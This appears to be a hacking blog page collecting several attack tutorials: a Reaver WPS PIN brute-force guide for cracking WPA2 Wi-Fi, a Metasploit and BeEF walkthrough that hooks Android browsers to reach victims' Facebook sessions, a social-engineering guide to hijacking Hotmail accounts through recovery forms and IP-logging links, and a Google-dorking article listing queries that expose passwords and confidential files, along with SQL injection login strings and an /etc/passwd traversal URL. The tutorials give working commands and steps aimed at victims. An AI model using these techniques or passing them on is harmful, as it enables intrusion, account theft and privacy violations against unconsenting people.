Pages

Showing posts with label website Hacking. Show all posts
Showing posts with label website Hacking. Show all posts

How To Hack WPA2 Wifi WPS Pin Attack

How To Hack WPA2 Wifi:
WPS Pin Attack
I am going to teach you how to easily hack WPA/WPA2-PSK enabled networks using Reaver. The targeted router should support WPS (WiFi Protected Setup) which is supported by most routers nowadays. WPS is an optional device configuration protocol for wireless access points which makes it really easy to connect.
WPS exists in most routers for easy setup process through the WPS pin, which is hard- coded into the wireless access point. Reaver takes the advantage of a vulnerability in WPS. Thanks to Craig Heffner for releasing an open-source version of this tool named Reaver that exploits the vulnerability. In simple terms, Reaver tries to bruteforce the pin; which will reveal the WPA or WPA2 password after enough time.
NOTE: This tutorial is for Educational Purposes Only!
What You’ll Need
You do not have to be a expert at Linux or at using a computer. The simple command- line (console ) will do it all. You may need a fair bit of time for this process and maybe also some luck. The brute force may take from 2 hours to more than 10 hours. There are various ways to set up Reaver, but here are the requirements for this guide.
• Backtrack OS. Backtrack is a bootable Linux distribution with lots of pen- testing tools. You can use various other Linux distribution but I prefer Backtrack. If you don`t know how to install Backtrack then please check this link first.
• Computer and wireless network card. I cannot guarantee this will work with all the internal wireless card. I recommend a external wireless card.
• Patience. The process is simple but brute forcing the PIN takes time. So you have to be patient. Kicking the computer won’t help.
Let’s Get Started
UPDATE: Instead Of Using Backtrack, Use Kali Linux.
Its The New Backtrack.
Step 1: Boot into Backtrack OS / Kali Linux OS
You can use any method to boot into Backtrack eg. from live CD, VMware, dual boot, etc. Boot it first into the GUI mode and open up a new console (command line) which is in the taskbar. Then boot into backtrack.During the boot process, BackTrack will prompt you to to choose the boot options. Select “BackTrack Text – Default Boot Text Mode” and press Enter.
After some time Backtrack will take you into a command line prompt where you should type startx and press Enter. BackTrack will boot will into Graphical User Interface (GUI) mode.
Step 2 : Install Reaver (Skip this step if you are using BackTrack 5)
Reaver should be already installed in the Backtrack 5 but if you are using an older version of Backtrack or any other Linux distribution, you can install Reaver by using the steps below.
1. First Connect your BackTrack to the internet. For WiFi connection go to
Application > Internet > WICD Network Manager.
2. Select your network and click connect and input your password if necessary,
click OK and click CONNECT the second time.
Now that you are connected to internet, it’s time to install Reaver. Click the terminal icon in the menu bar. And at the console type the following:
apt-get update
apt-get install reaver
Now if everything worked fine you will get a freshly installed Reaver tool. If you are testing it in your own system, please go to WICD Network Manager and Disconnect yourself first!
Step 3 : Gather Information
Before launching the Reaver attack, you need to know your target wireless network name or BSSID. This is the series of unique letters and number of a particular router, and you will need its channel number too. To find this, make your wireless card go into monitor mode, and gather the required information from the access points. Let’s go.
First lets find your wireless card. Inside terminal or console, type:
airmon-ng
Press Enter and you should see a list of interface names of different devices. There should be a wireless device in that list connected to BackTrack. Probably it may be WLAN0 or WLAN1.
Note: To connect your wireless network card into WMware, firstly, connect it to the USB. You will see a small USB icon that looks like the figure in the top right of VMware. Right-click on the icon and click connect. The USB sign will turn green and start to glow.
Enable monitor mode. Assuming your wireless card interface name is WLAN0, type this command in that same console.
airmon-ng start wlan0
This code will create a new monitor mode interface mon0 as in the screenshot below. Keep note of the code.
Search the BSSID of the Access Point(router) you want to crack. There are few ways to search for the Access Point BSSID, but I prefer to use the inbuilt Reaver search method which shows the list of WPS-vulnerable BSSIDs only.
In the console, type this following command and press enter:
wash -i mon0
You will see the list of wireless networks that support WPS and are vulnerable to Reaver as seen in the screenshot below. After few minutes you can stop the scan by pressing Ctrl+C.
Step 4: Let’s Start Cracking
I suggest you to try to crack the ones which have WPS lock disabled or say “NO” in WPS Locked column. It may also work if it says YES but I am not sure of that. For that, copy the BSSID of the target AP and also keep note of its channel. In the console, type the following then Enter:
reaver -i monitormode -c channel -b targetbssid -vv
In my case the monitor mode will be mon0 channel 1, targetbssid would be C8:3A:35:54:88:81
-vv is written to show the current statistic of the attack as a percentage completed, currently brute forcing PIN and so on; so we will type the following and enter:
reaver -i mon0 -c 1 -b C8:3A:35:54:88:81 -vv
Press Enter and you should see the attack process as in the screenshot below.
Please note that you will not get “Restore previous session...” at this point, because I already tried to crack it, and it’s prompting me to resume from that paused point.
Your progress will also be saved if you press Ctrl+C. It will then prompt you in the same way, if you again hit the command, and you can resume it from there.
Now just wait or have some coffee and let Reaver do its magic.
It might take from 2 hours to 10 hours or more. There are 8 numeric digits of WPS, but the WPS authentication protocol cuts the pin in half and validates each half separately. Since the last digit of pin is a cheksum value, which can be calculated on the basis of previous value, there are 10^4=10,000 possible values for first half and then 10^3=1000 values for the last pin. So the WPS pin code is one of 11,000 possible pin codes. Some APs can check the WPS pin at the rate of 1 pin per second. Some take more so it depends upon the AP, and also the network connection.
When the PIN is successfully brute-forced, Reaver will show you the WPS PIN and the plain password of the AP like in the below screenshot.
I recommend you keep note of the WPS pin, so that if the password is changed again you can hack that in few seconds the next time by using the following process.
reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -vv
Example:
reaver -i mon0 -b 11:22:33:44:55:66 -c 1 --pin=12345678 -vv
So now the error part... as you might get a bunch of errors depending upon your conditions. You might get some timeout but that’s normal. If you are getting other errors, see the below Error Section.
Error Section:
• If 10 consecutive unexpected WPS errors are encountered, a warning message will be shown. This may be a sign that the AP is rate limiting pin attempts. A waiting command can be issued whenever these warning messages appear. Use the following command:
reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
• The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
reaver -i mon0 -b 00:01:02:03:04:05 -t 3
• The default delay period between pin attempts is 1 second. This value can be increased or decreased to any value. Please note that 0 means no delay:
reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Here ends the tutorial on how to crack wireless network easily using Reaver.

Good Luck!

Hacking Wireless Networks for Dumies

Hacking Facebook - Same Origin Policy Exploit

Hacking Facebook:
Same Origin Policy Exploit
Same-origin policy (SOP) is one of the key security measures that every browser should meet. What it means is that browsers are designed so that webpages can't load code that is not part of their own resource. This prevents attackers from injecting code without the authorization of the website owner.
Unfortunately, the default Android browser can be hacked as it does not enforce the SOP policy adequately. In this way, an attacker can access the user's other pages that are open in the browser, among other things. This means that if we can get the user to navigate to our website and then send them some malicious code, we can then access other sites that are open in their browser, such as Facebook.
Step 1: Open Metasploit
Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.
Step 2: Find the Exploit
Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss
Step 3: Get the Info
Now that we have loaded the module, let's get some information on this module. We can do this by typing:
msf >info
As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.
Step 4: Show Options
Next, let see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.
Step 5: Open BeEF
Now, open BeEF On Kali Linux
Step 6: Set JS to BeEF Hook Back to Metasploit now. We need to set the REMOTE_JS to the hook on
BeEF. Of course, make certain you use the IP of the server that BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /
Step 7: Run the Server
Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF
hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.
msf > run
Step 8: Navigate to the Website from
an Android Browser
Now we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP is of your website.
Step 9: Hook Browser
When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser!
Step 10: Detect if the Browser Is
Authenticated to Facebook
Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower right.
When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page!

Facebook Password Extractor.

Hack Hotmail

Hey guys,
Today I’m going to show you how to hack almost any MSN account. This guide has been posted by many people, however they all have some crappy version of it. This is the real deal, this is a E-Book on how to hack almost any MSN account! Please note, there is a large amount of social engineering that needs to be done. I will explain how. Note: There is a video.
Step 1:
Go to https://support.live.com/eform.aspx?productKey=wlidvalidation. Then press continue, and press continue again. Until you get to the page where it asks for the Contact Email Address. Put your email address where it says .
* Contact Email Address
(Please supply an email address where we can contact you now.)
myemail@hotmail.com
.
Step 2:
Ok, now put your victims e-mail address where it says
* Windows Live ID Account (Please supply the name of the account you trying to recover and log on to.
victim@hotmail.com
And then click continue.
Step 3:
Now it will ask you for your victim’s full name. Put the victim’s full name if you know him/her personally. If you don’t, if you’re friends with him/her on MSN, click on the person’s MSN profile and it should show their name. If you don’t know their name, this is where social engineering comes in.
Example
* Full Name
Christopher James
Step 4:
It will ask you for the victim’s date of birth. If you know the person personally, put his/her DoB. If you don’t, check facebook, myspace, or any other social networking site for this person’s DOB. If you still cannot find it, you might want to Social Engineer it by saying the following to your victim when talking to him/her.
You: “Happy Birthday!
Victim: “Huh?! It’s not my birthday”
You: “Really? Isn’t it PUT TODAY’S DATE HERE”
Victim: “Nope, it’s VICTIM’S BIRTHDAY”
You: “Oh, how old are you turning?”
Victim: “X years old.”

Example Date of birth:
1/15/93

Step 5:
Next, it will ask you for the victim’s
Country:
Skip to Step 8 State: (if applicable)
Skip to Step 8 if
* ZIP or Postal Code:
Skip to Step 8 if
If you know it, then enter it. If you don’t know it, skip to Step 8.
Step 6: It will now ask you for the Victim’s
The secret answer to your question:
I don't reme
Put I don’t remember.
Step 7:
It will now ask you for the victim’s:
* Your alternate e-mail address: (This is the alternate email address you stored with your account information and is not necessarily your contact email.)
victim@hotmail.com
Put the victim’s email address in this space.
Step 8: Here is the somewhat hard part. It will ask for the Victim’s IP Address. Now this really isn’t hard if you have close contact with the victim, such as facebook chat or MSN or AIM chat. A good way of getting the victim’s IP Address is to go to http://whatstheirip.com/ and do what it says. Once the victim clicks on your link, you will successfully have their IP.
Step 9: For those of you who didn’t know your victim’s Country, State, and Zip , in Step 5 we’re going to go back to Step # 5. Now you have the victim’s IP. Let’s say it’s 63.85.157.84 Now go to www.infosniper.net and search up their IP. You will get all their information which you will need for step 5 and 10. Now that you’ve got their country and state, put it in step 5. Sometimes infosniper won’t give you their postal code. Then you have to search for their zipcode online by latitude and longitude.
Step 10:
Now it will ask you for their Internet Service Provider, which you found in Step 9. Put it in.
Step 11: Now it will ask you for their:
The names of any folders that you created in addition to the default folders:
Names of contacts in your Hotmail address book:
Subjects of any old mail that is in your Hotmail Inbox or mail folders:
If you know it, put it. If you don’t know any other contacts in the victim’s email address, put smarterchild@live.com
For example, if your victim is interested in nba, gaming, and hacking, you can come to the conclusion that he’ll receive mail from hackforums, nextgenupdate, callofduty.com, espn, nba.com etc...
Step 12: Next it will ask for:
Names of contacts on your Messenger contact list:
Your Messenger nickname (display name):
If you know people that your victim had on their MSN, put it. If you don’t know anything else, put the same thing that you did for Step 11. For messenger nickname, put it if you know it. You can leave this blank.
Step 13
Nothing else is required/valuable. If you know anything else that it asks for, put it. Then click continue. Now they will give you a pin number to access a private forum just incase. Write it down. Then enter your PIN, and you can see the forum.
They should now send the MSN password in 24 hours. If they don’t send it to you in 24 hours or less, visit the private forum.
Enjoy!!!
- Kidstand/Scooter
Video:
http://www.youtube.com/watch?v=l7oWDvYgil0

You can use either http://www.s33.net/rec/create or http://whatstheirip.com/.

Dangerous Google searching for Secrets - Cyber Dudes

Dangerous Google – Searching for Secrets
Information which should be protected is very often publicly available, revealed by careless or ignorant users. The result is that lots of confidential data is freely available on the Internet – just Google for it.
Google serves some 80 percent of all search queries on the Internet, mak- ing it by far the most popular search engine. Its popularity is due not only to excel- lent search effectiveness, but also extensive querying capabilities. However, we should also remember that the Internet is a highly dynamic medium, so the results presented by Google are not always up-to-date – some search results might be stale, while other relevant resources might not yet have been visited by Googlebot (the automatic script that browses and indexes Web resources for Google).
Table 1 presents a summary of the most important and most useful query operators along with their descriptions, while Figure 1 shows document locations referred to by the operators when applied to Web searches. Of course, this is just a handful of examples – skil- ful Google querying can lead to much more interesting results. Hunting for Prey
Google makes it possible to reach not just publicly available Internet resources, but also some that should never have been revealed.
hakin9 4/2005
www.hakin9.org
What You Will Learn...
• how to use Google to find sources of personal information and other confidential data,
• how to find information about vulnerable sys- tems and Web services,
• how to locate publicly available network de- vices using Google.
What You Should Know...
• how to use a Web browser,
• basic rules of operation of the HTTP protocol.
About the Author Michał Piotrowski holds an MA in IT and has many years' experience in network and system administration. For over three years he has been a security inspector and is currently work- ing as computer network security expert at one of the largest Polish financial institutions. His free time is occupied by programming, cryp- tography and contributing to the open source community.
Google hacking
Table 1. Google query operators
Operator Description Sample query
site restricts results to sites within the
specified domain
will find all sites containing the word fox, located within the *.google.com domain
intitle restricts results to documents whose
title contains the specified phrase
site:google.com fox
will find all sites with the word fox in the title and fire in the text
allintitle restricts results to documents
whose title contains all the specified phrases
intitle:fox fire
will find all sites with the words fox and fire in the title, so it's equivalent to
intitle:fox
intitle:fire
inurl restricts results to sites whose URL
contains the specified phrase
allintitle:fox fire
will find all sites containing the word fire in the text and fox in the URL
allinurl restricts results to sites whose URL
contains all the specified phrases
inurl:fox fire
will find all sites with the words fox and fire in the URL, so it's equivalent to
inurl:fox
inurl:fire
filetype, ext restricts results to documents of the
specified type
allinurl:fox fire
will return PDFs containing the word fire, while filetype:xls fox will return Excel spreadsheets with the word fox
numrange restricts results to documents con-
taining a number from the specified range
filetype:pdf fire
will return sites containing a number from 1 to 100 and the word fire. The same result can be achieved with
1..100 fire
link restricts results to sites containing
links to the specified location
numrange:1-100 fire
will return documents containing one or more links to www.google.com
inanchor restricts results to sites containing
links with the specified phrase in their descriptions
link:www.google.com
will return documents with links whose description contains the word fire (that's the actual link text, not the URL indicated by the link)
allintext restricts results to documents con-
taining the specified phrase in the text, but not in the title, link descrip- tions or URLs
inanchor:fire
will return documents which con- tain the phrase fire fox in their text only
+ specifies that a phrase should occur
frequently in results
allintext:"fire fox"
will order results by the number of occurrences of the word fire
- specifies that a phrase must not oc-
cur in results
+fire
will return documents that don't contain the word fire
"" delimiters for entire search phrases
(not single words)
-fire
"fire fox"
will return documents containing the phrase fire fox
. wildcard for a single character
fire.fox
will return documents containing the phrases fire fox, fireAfox, fire1fox, fire-fox etc.
* wildcard for a single word
fire * fox
will return documents containing the phrases fire the fox, fire in fox, fire or fox etc.
| logical OR
"fire fox" | firefox
will return documents containing the phrase fire fox or the word firefox
The right query can yield some quite remarkable results. Let's start with something simple.
Suppose that a vulnerability is discovered in a popular application – let's say it's the Microsoft IIS server version 5.0 – and a hypothetical at- tacker decides to find a few comput- ers running this software in order to attack them. He could of course use
Figure 1. The use of search query operators illustrated using the hakin9 website
Figure 2. Locating IIS 5.0 servers using the intitle operator
a scanner of some description, but he prefers Google, so he just enters the query
"Microsoft-IIS/5.0 Server
at" intitle:index.of
and obtains links to the servers he needs (or, more specifically, links to autogen- erated directory listings for those servers). This works because in its standard configuration, IIS (just like many other server applications) adds
www.hakin9.org
banners containing its name and ver- sion to some dynamically generated pages (Figure 2 shows this query in action).
It's a typical example of infor- mation which seems quite harm- less, so is frequently ignored and remains in the standard con- figuration. Unfortunately, it is also information which in certain circum- stances can be most valuable to a potential attacker. Table 2 shows more sample Google queries for typical Web servers.
Another way of locating specific versions of Web servers is to search for the standard pages displayed after successful server installation. Strange though it may seem, there are plenty of Web servers out there, the default configuration of which hasn't been touched since installa- tion. They are frequently forgotten, ill-secured machines which are easy prey for attackers. They can be located using the queries shown in Table 3.
This method is both very simple and extremely useful, as it provides access to a huge number of various websites and operating systems which run applications with known vulnerabilities that lazy or ignorant administrators have not patched. We will see how this works for two fairly popular programs: WebJeff Fileman- ager and Advanced Guestbook.
The first is a web-based file manager for uploading, browsing, managing and modifying files on a server. Unfortunately, WebJeff Filemanager version 1.6 contains a bug which makes it possible to download any file on the server, as long as it's accessible to the user running the HTTP daemon. In other words, specifying a page such as /index.php3?action=telecharger&f ichier=/etc/passwd in a vulnerable system will let any intruder download the /etc/passwd file (see Figure 3). The aggressor will of course locate vulnerable installations by querying Google for
"WebJeff-Filemanager
1.6" Login
. Our other target – Advanced Guestbook – is a PHP application
Table 2. Google queries for locating various Web servers
Query Server
"Apache/1.3.28 Server at" intitle:index.of Apache 1.3.28
"Apache/2.0 Server at" intitle:index.of Apache 2.0
"Apache/* Server at" intitle:index.of any version of Apache
"Microsoft-IIS/4.0 Server at" intitle:index.of Microsoft Internet Information Services 4.0
"Microsoft-IIS/5.0 Server at" intitle:index.of Microsoft Internet Information Services 5.0
"Microsoft-IIS/6.0 Server at" intitle:index.of Microsoft Internet Information Services 6.0
"Microsoft-IIS/* Server at" intitle:index.of any version of Microsoft Internet Information Services
"Oracle HTTP Server/* Server at" intitle:index.of any version of Oracle HTTP Server
"IBM _ HTTP _ Server/* * Server at" intitle:index.of any version of IBM HTTP Server
"Netscape/* Server at" intitle:index.of any version of Netscape Server "Red Hat Secure/*" intitle:index.of any version of the Red Hat Secure server "HP Apache-based Web Server/*" intitle:index.of any version of the HP server
Table 3. Queries for discovering standard post-installation Web server pages
Query Server
intitle:"Test Page for Apache Installation" "You are free" Apache 1.2.6
intitle:"Test Page for Apache Installation" "It worked!"
"this Web site!"
with SQL database support, used for adding guestbooks to web- sites. In April 2004, information was published about a vulnerabil- ity in the application's 2.2 version, making it possible to access the administration panel using an SQL injection attack (see SQL Injection Attacks with PHP/MySQL in hakin9 3/2005). It's enough to navigate to the panel login screen (see Figure 4) and log in leaving the username blank and entering
') OR
Apache 1.3.0 – 1.3.9
intitle:"Test Page for Apache Installation" "Seeing this
instead"
Apache 1.3.11 – 1.3.33, 2.0
intitle:"Test Page for the SSL/TLS-aware Apache
Installation" "Hey, it worked!"
Apache SSL/TLS
intitle:"Test Page for the Apache Web Server on Red Hat
Linux"
Apache on Red Hat
intitle:"Test Page for the Apache Http Server on Fedora
Core"
Apache on Fedora
intitle:"Welcome to Your New Home Page!" Debian Apache on Debian
intitle:"Welcome to IIS 4.0!" IIS 4.0
intitle:"Welcome to Windows 2000 Internet Services" IIS 5.0
intitle:"Welcome to Windows XP Server Internet Services" IIS 6.0
('a' = 'a
as password or the other
diately patch any vulnerabilities. way around – leaving password
Another thing to bear in mind is that blank and entering
? or 1=1 --
for
it's well worth removing application username. The potential aggres-
banners, names and versions from sor can locate vulnerable websites
any pages or files that might contain by querying Google for
intitle:
them.
Guestbook "Advanced Guestbook Powered"
or
"Advanced Guestbook
2.2" Username inurl:admin
.
2.2
Information about Networks and Systems To prevent such security leaks,
Practically all attacks on IT sys- administrators should track current
tems require preparatory target information on all the applications
reconnaissance, usually involving used by their systems and imme-
scanning computers in an attempt
w
to recognise running services, op- erating systems and specific service software. Network scanners such as Nmap or amap are typically used for this purpose, but another possibility also exists. Many system administra- tors install Web-based applications which generate system load statis- tics, show disk space usage or even display system logs.
All this can be valuable informa- tion to an intruder. Simply querying Google for statistics generated and signed by the phpSystem applica- tion using the query
"Generated by
phpSystem"
will result in a whole list of pages similar to the one shown in Figure 5. The intruder can also query for pages generated by the Sysinfo script using
intitle:"Sysinfo
* " intext:"Generated by Sysinfo *
written by The Gamblers."
– these pages contain much more system information (Figure 6).
This method offers numerous possibilities – Table 4 shows sam- ple queries for finding statistics and other information generated by sev- eral popular applications. Obtaining such information may encourage the intruder to attack a given system and will help him find the right tools and exploits for the job. So if you decide to use Web applications to monitor computer resources, make sure ac- cess to them is password-protected.
Looking for Errors HTTP error messages can be ex- tremely valuable to an attacker, as they can provide a wealth of infor- mation about the system, database structure and configuration. For example, finding errors generated by an Informix database merely re- quires querying for
"A syntax error
has occurred" filetype:ihtml
. The re- sult will provide the intruder with er- ror messages containing information on database configuration, a sys- tem's file structure and sometimes even passwords (see Figure 7). The results can be narrowed down to only those containing passwords by altering the query slightly:
"A syntax
error has occurred" filetype:ihtml
intext:LOGIN
.
Google hacking
Equally useful information can be obtained from MySQL database errors simply by querying Google for
"Access denied for user" "Using
password"
– Figure 8 shows a typical website located in this manner. Ta- ble 5 contains more sample queries using the same method.
The only way of preventing our systems from publicly revealing error information is removing all bugs as soon as we can and (if possible) con- figuring applications to log any errors to files instead of displaying them for the users to see.
Remember that even if you react quickly (and thus make the error pages indicated by Google out-of-date), a potential intruder will still be able to examine the ver- sion of the page cached by Google by simply clicking the link to the page copy. Fortunately, the sheer volume of Web resources means
Figure 6. Statistics generated by Sysinfo
Table 4. Querying for application-generated system reports
Query Type of information "Generated by phpSystem" operating system type and version, hardware configura- tion, logged users, open connections, free memory and disk space, mount points
"This summary was generated by wwwstat" web server statistics, system file structure "These statistics were produced by getstats" web server statistics, system file structure
"This report was generated by WebLog" web server statistics, system file structure intext:"Tobias Oetiker" "traffic analysis" system performance statistics as MRTG charts, network
configuration
intitle:"Apache::Status" (inurl:server-status | inurl:
status.html | inurl:apache.html)
server version, operating system type, child process list, current connections
intitle:"ASP Stats Generator *.*" "ASP Stats
Generator" "2003-2004 weppos"
web server activity, lots of visitor information
intitle:"Multimon UPS status page" UPS device performance statistics
intitle:"statistics of" "advanced web statistics" web server statistics, visitor information
intitle:"System Statistics" +"System and Network
Information Center"
system performance statistics as MRTG charts, hard- ware configuration, running services
intitle:"Usage Statistics for" "Generated by
Webalizer"
web server statistics, visitor information, system file structure
intitle:"Web Server Statistics for ****" web server statistics, visitor information inurl:"/axs/ax-admin.pl" -script web server statistics, visitor information inurl:"/cricket/grapher.cgi" MRTG charts of network interface performance inurl:server-info "Apache Server Information" web server version and configuration, operating system
type, system file structure "Output produced by SysWatch *" operating system type and version, logged users, free
memory and disk space, mount points, running proc- esses, system logsQuery Result
"A syntax error has occurred"
filetype:ihtml
Informix database errors, potentially containing function names, filenames, file structure information, pieces of SQL code and passwords
"Access denied for user" "Using
password"
authorisation errors, potentially containing user names, function names, file structure information and pieces of SQL code
"The script whose uid is " "is
not allowed to access"
access-related PHP errors, potentially containing filenames, function names and file structure information
"ORA-00921: unexpected end of SQL
command"
Oracle database errors, potentially containing filenames, function names and file structure information
"error found handling the
request" cocoon filetype:xml
Cocoon errors, potentially containing Cocoon version information, filenames, function names and file structure information
"Invision Power Board Database
Error"
Invision Power Board bulletin board errors, potentially containing function names, filenames, file structure information and piece of SQL code
"Warning: mysql _ query()"
"invalid query"
MySQL database errors, potentially containing user names, function names, filenames and file structure information
"Error Message : Error loading
required libraries."
CGI script errors, potentially containing information about operating system and program versions, user names, filenames and file structure information "#mysql dump" filetype:sql MySQL database errors, potentially containing information about database
structure and contents
www.hakin9.org
that pages can only be cached for a relatively short time. Prowling for Passwords Web pages contain a great many passwords to all manner of resourc- es – e-mail accounts, FTP servers or even shell accounts. This is mostly due to the ignorance of users who unwittingly store their passwords in publicly accessible locations, but also due to the carelessness of software manufacturers who either provide insufficient measures of protecting user data or supply no information about the necessity of modifying their products' standard configuration.
Take the example of WS_FTP, a well-known and widely-used FTP client which (like many utilities) of- fers the option of storing account passwords. WS_FTP stores its configuration and user account information in the WS_FTP.ini file. Unfortunately, not everyone real- ises that gaining access to an FTP client's configuration is synonymous with gaining access to a user's FTP resources. Passwords stored in the WS_FTP.ini file are encrypted, but this provides little protection – once an intruder obtains the configuration
Google hacking
file, he can either decipher the pass- word using suitable tools or simply install WS_FTP and run it with the stolen configuration. And how can the intruder obtain thousands of WS_FTP configuration files? Using Google, of course. Simply querying for
"Index of/" "Parent Directory"
"WS _ FTP.ini"
or
filetype:ini WS _ FTP
PWD
will return lots of links to the data he requires, placed at his evil dispos- al by the users themselves in their blissful ignorance (see Figure 9).
Another example is a Web ap- plication called DUclassified, used for managing website advertising materials. In its standard configura- tion, the application stores all the user names, passwords and other data in the duclassified.mdb file, located in the read-accessible _private subdirectory. It is therefore enough to find a site that uses DU- classified, take the base URL http:// <host>/duClassified/ and change it to http://<host>/duClassified/ _private/duclassified.mdb to ob- tain the password file and thus obtain unlimited access to the ap- plication (as seen in Figure 10). Websites which use the vulner- able application can be located by querying Google for
"Powered
by DUclassified" -site:duware.com (the additional operator will filter out results from the manufacturer's website). Interestingly enough, the makers of DUclassified – a com- pany called DUware – have also created several other applications with similar vulnerabilities.
In theory, everyone knows that passwords should not reside on post-its stuck to the monitor or under the keyboard. In practice, however, surprisingly many people store passwords in text files and put them in their home directories, which (funnily enough) are acces- sible through the Internet. What's more, many such individuals work as network administrators or simi- lar, so the files can get pretty big. It's hard to define a single method of locating such data, but googling for such keywords as account, us- ers, admin, administrators, passwd,
Figure 9. WS_FTP configuration file
password and so on can be pretty effective, especially coupled with such filetypes as .xls, .txt, .doc, .mdb and .pdf. It's also worth noting
directories whose names contain the words admin, backup and so forth – a query like
inurl:admin
intitle:index.of
will do the trick.

To make our passwords less accessible to intruders, we must carefully consider where and why we enter them, how they are stored and what happens to them. If we're in charge of a website, we should ana- lyse the configuration of the applica- tions we use, locate poorly protected
Table 6. Google queries for locating passwords
Query Result "http://*:*@www" site passwords for site, stored as the string
"http://username:
password@www..."
filetype:bak inurl:"htaccess|passwd|shadow|ht
users"
file backups, potentially containing user names and passwords
filetype:mdb inurl:"account|users|admin|admin
istrators|passwd|password"
mdb files, potentially containing password information
intitle:"Index of" pwd.db pwd.db files, potentially containing user names and encrypted
passwords inurl:admin inurl:backup intitle:index.of directories whose names contain the words admin and backup
"Index of/" "Parent Directory" "WS _ FTP.ini"
filetype:ini WS _ FTP PWD
WS_FTP configuration files, potentially containing FTP server access passwords
ext:pwd inurl:(service|authors|administrators
|users) "# -FrontPage-"
files containing Microsoft FrontPage passwords
filetype:sql ("passwd values ****" |
"password values ****" | "pass values ****" )
files containing SQL code and passwords inserted into a database
intitle:index.of trillian.ini configuration files for the Trillian IM
eggdrop filetype:user user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf configuration files for OpenLDAP
inurl:"wvdial.conf" intext:"password" configuration files for WV Dial
ext:ini eudora.ini configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb Microsoft Access files, potentially containing user account infor-
mation intext:"powered by Web Wiz Journal" websites using Web Wiz Journal, which in its standard con-
figuration allows access to the passwords file – just enter
http:
//<host>/journal/journal.mdb
instead of the default
http://<host>/
journal/
"Powered by DUclassified" -site:duware.com
"Powered by DUcalendar" -site:duware.com
"Powered by DUdirectory" -site:duware.com
"Powered by DUclassmate" -site:duware.com
"Powered by DUdownload" -site:duware.com
"Powered by DUpaypal" -site:duware.com
"Powered by DUforum" -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |
view.asp | voting.asp) -site:duware.com
websites using the DUclassified, DUcalendar, DUdirectory, DU- classmate, DUdownload, DUpaypal, DUforum or DUpics applica- tions, which by default make it possible to obtain the passwords file – for DUclassified, just enter
http://<host>/duClassified/ _
private/duclassified.mdb
instead of
http://<host>/duClassified/
intext:"BiTBOARD v2.0" "BiTSHiFTERS Bulletin
Board"
websites using the Bitboard2 bulletin board application, which on default settings allows the passwords file to be obtained – enter
http://<host>/forum/admin/data _ passwd.dat
instead of the default
http://<host>/forum/forum.php
or particularly sensitive data and take appropriate steps to secure it.
Personal Information and Confidential Documents Both in European countries and the U.S., legal regulations are in place to protect our privacy. Unfortunately,
www.hakin9.org
it is frequently the case that all sorts of confidential documents contain- ing our personal information are placed in publicly accessible loca- tions or transmitted over the Web without proper protection. To get our complete information, an intruder need only gain access to an e-mail repository containing the CV we sent out while looking for work. Address, phone number, date of birth, education, skills, work experience – it's all there.
Thousands of such documents can be found on the Internet – just query Google for
intitle:
"curriculum vitae" "phone * *
*" "address *" "e-mail"
. Finding contact information in the form of names, phone number and e- mail addresses is equally easy (Figure 11). This is because most Internet users create electronic ad- dress books of some description. While these may be of little interest to your typical intruder, they can be dangerous tools in the hands of a skilled sociotechnician, especially if the contacts are restricted to one company. A simple query such as
filetype:xls inurl:"email.xls"
Figure 11. Electronic address book obtained through Google
can be surprisingly effective, finding Excel spreadsheet called email.xls. All the above also applies to instant messaging applications and their contact lists – if an intruder obtains such a list, he may be able to pose as our IM friends. Interestingly enough, a fair amount of personal data can also be obtained from of- ficial documents, such as police reports, legal documents or even medical history cards.
The Web also contains docu- ments that have been marked as confidential and therefore contain sensitive information. These may include project plans, technical doc- umentation, surveys, reports, pres- entations and a whole host of other company-internal materials. They are easily located as they frequently contain the word confidential, the phrase Not for distribution or simi- lar clauses (see Figure 12). Table 7 presents several sample queries that reveal documents potentially containing personal information and confidential data.
As with passwords, all we can do to avoid revealing private infor- mation is to be cautious and retain maximum control over published data. Companies and organisations should (and many are obliged to) specify and enforce rules, proce- dures and standard practices for.

filetype:xls inurl:"email.xls" email.xls files, potentially containing contact information
"phone * * *" "address *" "e-mail" intitle:
"curriculum vitae"
CVs
"not for distribution" confidential documents containing the confidential clause
buddylist.blt AIM contacts list
intitle:index.of mystuff.xml Trillian IM contacts list filetype:ctt "msn" MSN contacts list filetype:QDF QDF database files for the Quicken financial application intitle:index.of finances.xls finances.xls files, potentially containing information on bank ac-
counts, financial summaries and credit card numbers intitle:"Index Of" -inurl:maillog maillog size maillog files, potentially containing e-mail
"Network Vulnerability Assessment Report"
"Host Vulnerability Summary Report"
filetype:pdf "Assessment Report"
"This file was generated by Nessus"
reports for network security scans, penetration tests etc.
Table 8. Queries for locating network devices
Query Device
"Copyright (c) Tektronix, Inc." "printer status" PhaserLink printers
inurl:"printer/main.html" intext:"settings" Brother HL printers
